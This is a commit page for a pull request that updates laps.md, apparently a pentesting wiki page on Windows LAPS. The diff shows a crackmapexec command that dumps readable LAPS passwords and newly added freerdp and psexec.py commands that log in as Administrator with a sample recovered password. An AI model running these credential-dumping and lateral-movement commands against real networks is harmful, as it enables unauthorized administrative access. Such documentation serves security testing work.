Merge pull request #906 from NoPurposeInLife/patch-3

Update laps.md
This commit is contained in:
SirBroccoli 2024-08-12 15:11:03 +02:00 committed by GitHub
commit 76b23043dd
No known key found for this signature in database
GPG key ID: B5690EEEBB952194

View file

@ -114,6 +114,15 @@ crackmapexec ldap 10.10.10.10 -u user -p password --kdcHost 10.10.10.10 -M laps
```
This will dump all the passwords that the user can read, allowing you to get a better foothold with a different user.
## ** Using LAPS Password **
```
freerdp /v:192.168.1.1:3389 /u:Administrator
Password: 2Z@Ae)7!{9#Cq
python psexec.py Administrator@web.example.com
Password: 2Z@Ae)7!{9#Cq
```
## **LAPS Persistence**
### **Expiration Date**